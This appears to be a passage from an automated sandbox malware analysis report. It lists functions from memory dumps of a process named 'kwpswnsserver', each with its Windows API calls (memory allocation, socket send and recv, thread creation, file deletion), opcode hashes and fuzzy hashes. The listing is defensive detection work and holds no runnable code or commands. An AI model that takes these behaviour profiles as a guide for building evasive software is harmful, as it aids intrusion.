                                                                  Function 04271100 Relevance: 4.6, APIs: 3, Instructions: 66memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __floor_pentium4.LIBCMT ref: 0427112F
                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0427115F
                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 04271192
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$AllocFree__floor_pentium4
                                                                  • String ID:
                                                                  • API String ID: 2605973128-0
                                                                  • Opcode ID: 75d13ac82dee8e11c5699fc593d40c1cdb885a971af8ae57b564c1d726c8003e
                                                                  • Instruction ID: 1f411f5526a7986ad7c237265850539c0659df8b62073e94b017bd35f064273e
                                                                  • Opcode Fuzzy Hash: 75d13ac82dee8e11c5699fc593d40c1cdb885a971af8ae57b564c1d726c8003e
                                                                  • Instruction Fuzzy Hash: 9C11D371F10309AFDB109FA9DC86B6EFBF8EF04745F008869ED59E7240EA74A8108710
                                                                  Function 04279DE0 Relevance: 4.5, APIs: 3, Instructions: 39windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 04279E04
                                                                  • GdipDisposeImage.GDIPLUS(?), ref: 04279E18
                                                                  • GdipDisposeImage.GDIPLUS(?), ref: 04279E3B
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Gdip$DisposeImage$BitmapCreateFromStream
                                                                  • String ID:
                                                                  • API String ID: 800915452-0
                                                                  • Opcode ID: 3c0db494c72d94242cbc56f49476434a6e4b948bcee6d596dd09b02c791d4fc7
                                                                  • Instruction ID: a361c3b00964b3a2c9305927db3e9af0bd7b4c6edcb076b105a53e8334125cd3
                                                                  • Opcode Fuzzy Hash: 3c0db494c72d94242cbc56f49476434a6e4b948bcee6d596dd09b02c791d4fc7
                                                                  • Instruction Fuzzy Hash: 10F0A4B1B11229E78B10EF98E8488AFF7B8EB44715B00469AFC05A7340DA349F45CBE5
                                                                  Function 04279AC0 Relevance: 4.5, APIs: 3, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(0429FB64), ref: 04279ADC
                                                                  • GdiplusStartup.GDIPLUS(0429FB60,?,?), ref: 04279B15
                                                                  • LeaveCriticalSection.KERNEL32(0429FB64), ref: 04279B26
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterGdiplusLeaveStartup
                                                                  • String ID:
                                                                  • API String ID: 389129658-0
                                                                  • Opcode ID: 531a824039eca36ce015a57c1265b0092b81d74ac896c480b290223968dddafc
                                                                  • Instruction ID: d5dd810cb21bce0d41b0577c1e67d9982c95315fd650fdc67a6483b2d30456e3
                                                                  • Opcode Fuzzy Hash: 531a824039eca36ce015a57c1265b0092b81d74ac896c480b290223968dddafc
                                                                  • Instruction Fuzzy Hash: 24F0C271B41309ABDF04DFD9E93A7AAB7B8F708311F100199D40492140CB761D48CBA1
                                                                  Function 6C9E31F9 Relevance: 4.5, APIs: 3, Instructions: 17fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DeleteFileW.KERNEL32(6C9D6201,?,6C9D6201,00000007), ref: 6C9E3201
                                                                  • GetLastError.KERNEL32(?,6C9D6201,00000007), ref: 6C9E320B
                                                                  • __dosmaperr.LIBCMT ref: 6C9E3212
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: DeleteErrorFileLast__dosmaperr
                                                                  • String ID:
                                                                  • API String ID: 1545401867-0
                                                                  • Opcode ID: 817b39c03b8b657559854391f83b1273a3d71a8edade32f3451ae40cca118a0b
                                                                  • Instruction ID: 02ce25bc801171585844119b5352f3c25dffcb02db730df041f2dedaf2d47b8d
                                                                  • Opcode Fuzzy Hash: 817b39c03b8b657559854391f83b1273a3d71a8edade32f3451ae40cca118a0b
                                                                  • Instruction Fuzzy Hash: E0D0123224871A67CF142AFAEC0C41B3BACEF9277D3148721F86CC56A0EF36C4529951
                                                                  Function 6C871F60 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  • Error retrieving folder path, xrefs: 6C871FE6
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: FolderPath
                                                                  • String ID: Error retrieving folder path
                                                                  • API String ID: 1514166925-3197305068
                                                                  • Opcode ID: d1278111c4dbad6d08a97d570947529046d52c20f86911989d802684027d1f34
                                                                  • Instruction ID: 1890e145d19c749d06f67596b1e637bbf1ca188e80c9c3823bd905f8d55f1b13
                                                                  • Opcode Fuzzy Hash: d1278111c4dbad6d08a97d570947529046d52c20f86911989d802684027d1f34
                                                                  • Instruction Fuzzy Hash: BA21F8B0E0430A9FCF14EFB8D5556AEBBF0FB49304F008929D449A7340E734A958CB92
                                                                  Function 6C866F40 Relevance: 3.2, APIs: 2, Instructions: 245COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e8941cf3c2486cd920bb02f64b4be5a10d10e53152024e913bcec62e8a0a6969
                                                                  • Instruction ID: 6652962792152a43e4164896fa3d33617443c07b2e99d106b82536736ee7f18e
                                                                  • Opcode Fuzzy Hash: e8941cf3c2486cd920bb02f64b4be5a10d10e53152024e913bcec62e8a0a6969
                                                                  • Instruction Fuzzy Hash: 33D158B4A093818FD374CF69C680B9ABBE1BB99304F108D2EE99D97751D730A944CB53
                                                                  Function 6C9E18FA Relevance: 3.2, APIs: 2, Instructions: 196fileCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6C9E1CA4: GetConsoleOutputCP.KERNEL32(E343E0B4,00000000,00000000,?), ref: 6C9E1D07
                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,6C9D4A95,?), ref: 6C9E1A7F
                                                                  • GetLastError.KERNEL32(?,6C9D4A95,?,6C9D4CD9,00000000,?,00000000,6C9D4CD9,?,00000000,00000000,6CA4F8C8,0000002C,6C9D4BC5,?), ref: 6C9E1A89
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ConsoleErrorFileLastOutputWrite
                                                                  • String ID:
                                                                  • API String ID: 2915228174-0
                                                                  • Opcode ID: 7da5aacb15726209fd54c7380641ae9b78192955a3506226568b0388b1955b1a
                                                                  • Instruction ID: 65f38b84f96b75082f1717bce0308f06927384d186f714b68b8160978ca893fc
                                                                  • Opcode Fuzzy Hash: 7da5aacb15726209fd54c7380641ae9b78192955a3506226568b0388b1955b1a
                                                                  • Instruction Fuzzy Hash: 1761A472D0411AAFDF02DFA8D884EEEBBBAAF2F308F144145E914A7656D331D905CB60
                                                                  Function 6C9C1D15 Relevance: 3.1, APIs: 2, Instructions: 92COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __RTC_Initialize.LIBCMT ref: 6C9C1D62
                                                                    • Part of subcall function 6C9C210E: InitializeSListHead.KERNEL32(6CA5A018,6C9C1D6C,6CA4F630,00000010,6C9C1F05,?,00000000,?,00000007,6CA4F650,00000010,6C9C1F18,?,?,6C9C1FA1,?), ref: 6C9C2113
                                                                  • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6C9C1DCC
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                  • String ID:
                                                                  • API String ID: 3231365870-0
                                                                  • Opcode ID: d759f6058e610f308dad9f4d22d2a40f8700f008db7ba69b95a2f64b0ead9c46
                                                                  • Instruction ID: 7053fa66321da014f5ade74ba70e058c2373cc9ec25de011ee9aab9add34a06f
                                                                  • Opcode Fuzzy Hash: d759f6058e610f308dad9f4d22d2a40f8700f008db7ba69b95a2f64b0ead9c46
                                                                  • Instruction Fuzzy Hash: FB21043270A7469EDF149FB8A9017DC3365AF1336DF10886AC545A7F80DB21C549867B
                                                                  Function 04272FD0 Relevance: 3.1, APIs: 2, Instructions: 82networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 04273043
                                                                  • recv.WS2_32(?,?,00040000,00000000), ref: 04273064
                                                                    • Part of subcall function 0427F91B: __getptd_noexit.LIBCMT ref: 0427F91B
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: __getptd_noexitrecvselect
                                                                  • String ID:
                                                                  • API String ID: 4248608111-0
                                                                  • Opcode ID: ef9f6b3aa087ed867b748e7d7ccbe9bdacf4dc8c9d440c52a011af652ff63027
                                                                  • Instruction ID: 763041fbe9608177efa489212b704cc43f8e12b213b9d00c0faab534e59953fa
                                                                  • Opcode Fuzzy Hash: ef9f6b3aa087ed867b748e7d7ccbe9bdacf4dc8c9d440c52a011af652ff63027
                                                                  • Instruction Fuzzy Hash: 9621B571714208EFEB30EF69DC89B9A77A4EF04314F1545A5E9049B290DBB0BD84DBA2
                                                                  Function 6C9E20D3 Relevance: 3.1, APIs: 2, Instructions: 80fileCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,6C9E1A65,00000000,6C9D4CD9,?,00000000,?,00000000), ref: 6C9E216F
                                                                  • GetLastError.KERNEL32(?,6C9E1A65,00000000,6C9D4CD9,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,6C9D4A95), ref: 6C9E2195
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastWrite
                                                                  • String ID:
                                                                  • API String ID: 442123175-0
                                                                  • Opcode ID: a8de432f979920a4266720ac6e82cc7dac515799c73fd92c95ee30f9ab9c83a1
                                                                  • Instruction ID: bfd44f137d32c1a5d1b9a97c077220863c44def43320ece0105fa71e35bf7e13
                                                                  • Opcode Fuzzy Hash: a8de432f979920a4266720ac6e82cc7dac515799c73fd92c95ee30f9ab9c83a1
                                                                  • Instruction Fuzzy Hash: 3E21A231A0121A9BCB1ACF29CC849E9B7B6BF5D305F2441A9EA09D7611D730DF42CB61
                                                                  Function 6C9C1E1C Relevance: 3.1, APIs: 2, Instructions: 75COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __RTC_Initialize.LIBCMT ref: 6C9C1E63
                                                                  • ___scrt_uninitialize_crt.LIBCMT ref: 6C9C1E7D
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Initialize___scrt_uninitialize_crt
                                                                  • String ID:
                                                                  • API String ID: 2442719207-0
                                                                  • Opcode ID: 1c5a144578b33f8652799a8183273776de1117f02b1f73015a09e39344e5a049
                                                                  • Instruction ID: 7414385919d1517605d365ec1db4e73c320a0f285172d4ce04ffa4c32cf6dc1e
                                                                  • Opcode Fuzzy Hash: 1c5a144578b33f8652799a8183273776de1117f02b1f73015a09e39344e5a049
                                                                  • Instruction Fuzzy Hash: 9E21F67275A30A9ADF149FACD9003DD37A8EB13319F20852AD514D3F80DB35C6058BAB
                                                                  Function 04273260 Relevance: 3.1, APIs: 2, Instructions: 60networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • send.WS2_32(?,?,00040000,00000000), ref: 04273291
                                                                  • send.WS2_32(?,?,?,00000000), ref: 042732CE
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: send
                                                                  • String ID:
                                                                  • API String ID: 2809346765-0
                                                                  • Opcode ID: ffd06a9d82c7a084fcae035b651e81e97414b1536852fda694f1afd48efecb1a
                                                                  • Instruction ID: 06028dd33cf0c240271f2a79a1efe4233173534abcd1684fc231dac6736b873d
                                                                  • Opcode Fuzzy Hash: ffd06a9d82c7a084fcae035b651e81e97414b1536852fda694f1afd48efecb1a
                                                                  • Instruction Fuzzy Hash: 1211E172B15304BBD720CA6EDC89B9ABB98FB81364F104025EF08D7280EA71BD41E655
                                                                  Function 6C9DFC5F Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000002,?,00000000,?,?,?,6C9DFB17,00000000,?,?,00000002,00000000), ref: 6C9DFC9B
                                                                  • GetLastError.KERNEL32(00000000,?,6C9DFB17,00000000,?,?,00000002,00000000,?,6C9E199F,?,00000000,00000000,00000002,?,?), ref: 6C9DFCA8
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastPointer
                                                                  • String ID:
                                                                  • API String ID: 2976181284-0
                                                                  • Opcode ID: b54dcb569206c37e8c9af2be9af1d2c9e0777c10159a4956a8adefaa35ce62d4
                                                                  • Instruction ID: 9c9e372866f4e34087f731cbe974eac2725b418b7610baab0bb0f843f383819c
                                                                  • Opcode Fuzzy Hash: b54dcb569206c37e8c9af2be9af1d2c9e0777c10159a4956a8adefaa35ce62d4
                                                                  • Instruction Fuzzy Hash: A8012B33700A55AFCB058F69DC05C9D3B69DF96368B258204FC11AB690E771E951DBD0
                                                                  Function 042730E0 Relevance: 3.0, APIs: 2, Instructions: 46sleeptimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: SleepTimetime
                                                                  • String ID:
                                                                  • API String ID: 346578373-0
                                                                  • Opcode ID: 7fa1c7097b3c3609dac28cfcc79affbf25e35779a766d8da037f3fbdfc3c446e
                                                                  • Instruction ID: 78df89cbabb61fa49c672e4d96f30985c587e1d92faf7a477eb0ff4328b7ea03
                                                                  • Opcode Fuzzy Hash: 7fa1c7097b3c3609dac28cfcc79affbf25e35779a766d8da037f3fbdfc3c446e
                                                                  • Instruction Fuzzy Hash: 3A01DF3171020AAFD311CF28D8C8B69B7A5FB99351F144264D9049B680C735BDC6D7E2
                                                                  Function 0427CD00 Relevance: 3.0, APIs: 2, Instructions: 38memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • HeapCreate.KERNEL32(00000004,00000000,00000000,0427E04E,00000000,04279800,?,?,?,00000000,0429125B,000000FF,?,0427E04E), ref: 0427CD1B
                                                                  • _free.LIBCMT ref: 0427CD56
                                                                    • Part of subcall function 04271280: __CxxThrowException@8.LIBCMT ref: 04271290
                                                                    • Part of subcall function 04271280: DeleteCriticalSection.KERNEL32(00000000,0427D3E6,04296624,?,?,0427D3E6,?,?,?,?,04295A40,00000000), ref: 042712A1
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                  • String ID:
                                                                  • API String ID: 1116298128-0
                                                                  • Opcode ID: 858a3eceb001ecce6b35d198992977e758d21b914f3a6cc485d4b2414723a69f
                                                                  • Instruction ID: 02b8d78d7e895c4679412b62f0cb8262aa5633a7d07a494b67dbd70df84e3e24
                                                                  • Opcode Fuzzy Hash: 858a3eceb001ecce6b35d198992977e758d21b914f3a6cc485d4b2414723a69f
                                                                  • Instruction Fuzzy Hash: 0A017AB0A00B409FD3309F6A9884A07FAE8FF98700B104A1ED2DAC6A10D774A505CF65
                                                                  Function 0427E480 Relevance: 3.0, APIs: 2, Instructions: 21synchronizationthreadCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateThread.KERNEL32(00000000,00000000,0427DF10,00000000,00000000,00000000), ref: 0427E49B
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,04281168,?,?,?,?,?,?,04296298,0000000C,04281210,?), ref: 0427E4A9
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CreateObjectSingleThreadWait
                                                                  • String ID:
                                                                  • API String ID: 1891408510-0
                                                                  • Opcode ID: f384285ece3dd1646ed32a6477e17a5af7003f3afe0b402d251f7efead1b5439
                                                                  • Instruction ID: eaa35dc05969887f0b26e45f88726ecba0f8f8c9ee2f1f55d7e312c0e27fff3e
                                                                  • Opcode Fuzzy Hash: f384285ece3dd1646ed32a6477e17a5af7003f3afe0b402d251f7efead1b5439
                                                                  • Instruction Fuzzy Hash: 22E012B0B54216BFDB109A5CBC8CE3673DCD704334B104656B910D2244DD79AC708AB4
                                                                  Function 0427F983 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __getptd.LIBCMT ref: 0427F98F
                                                                    • Part of subcall function 04283E5B: __getptd_noexit.LIBCMT ref: 04283E5E
                                                                    • Part of subcall function 04283E5B: __amsg_exit.LIBCMT ref: 04283E6B
                                                                    • Part of subcall function 0427F964: __getptd_noexit.LIBCMT ref: 0427F969
                                                                    • Part of subcall function 0427F964: __freeptd.LIBCMT ref: 0427F973
                                                                    • Part of subcall function 0427F964: ExitThread.KERNEL32 ref: 0427F97C
                                                                  • __XcptFilter.LIBCMT ref: 0427F9B0
                                                                    • Part of subcall function 0428418F: __getptd_noexit.LIBCMT ref: 04284195
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                                  • String ID:
                                                                  • API String ID: 418257734-0
                                                                  • Opcode ID: db0ab7168e39f37379fed61ec1a753d28f5197527b4f66888010e20637fd783c
                                                                  • Instruction ID: 5e4131cae8d3ff017722b7c8cc3da8861a69b4ff7b04b7169eb074e9a00c5ad7
                                                                  • Opcode Fuzzy Hash: db0ab7168e39f37379fed61ec1a753d28f5197527b4f66888010e20637fd783c
                                                                  • Instruction Fuzzy Hash: 7AE0ECB1A25601EFEB18FBA0D905E7D7775AF44A09F20014CE1016B2A1DB75B940DA20
                                                                  Function 04286403 Relevance: 3.0, APIs: 2, Instructions: 18COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __lock.LIBCMT ref: 0428641B
